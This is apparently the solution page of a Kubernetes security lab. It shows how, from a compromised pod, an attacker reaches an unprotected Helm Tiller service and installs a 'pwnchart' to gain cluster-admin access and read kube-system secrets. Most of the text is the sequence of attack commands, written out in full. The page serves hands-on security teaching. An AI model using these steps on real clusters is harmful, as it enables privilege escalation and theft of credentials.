Attacking Helm tiller without RBAC setup - Solution

• Let's assume that you already have access to a pod inside a cluster using an application vulnerability (Ex: Command Injection)

• Then we can run the below command to deploy simple pod which contains helm and kubectl binaries

kubectl run -n default --quiet --rm --restart=Never -ti --image=madhuakula/helm-security incluster

• If we check the version of the helm, it responds with Error: pods is forbidden: User "system:serviceaccount:default:default" cannot list pods in the namespace "kube-system". Means client not able to establish connection with server

helm version

• Let's telnet to Tiller's default service and port. We can connect to tiller-deploy.kube-system on port 44134

telnet tiller-deploy.kube-system 44134

Ctrl+C

• Now we can use the helm with host flag to talk to the server helm --host tiller-deploy.kube-system:44134 version

• Let's try getting the secrets from kube-system namespace using kubectl kubectl get secrets -n kube-system. We can clearly see that we can't get the secrets with default service account attached to this pod

• Let's go ahead and deploy our pwnchart helm chart

helm --host tiller-deploy.kube-system:44134 install /pwnchart

• Now let's try again to get the secrets from kube-system namespace using kubectl kubectl get secrets -n kube-system.

• We now have full cluster access to do whatever a cluster admin can do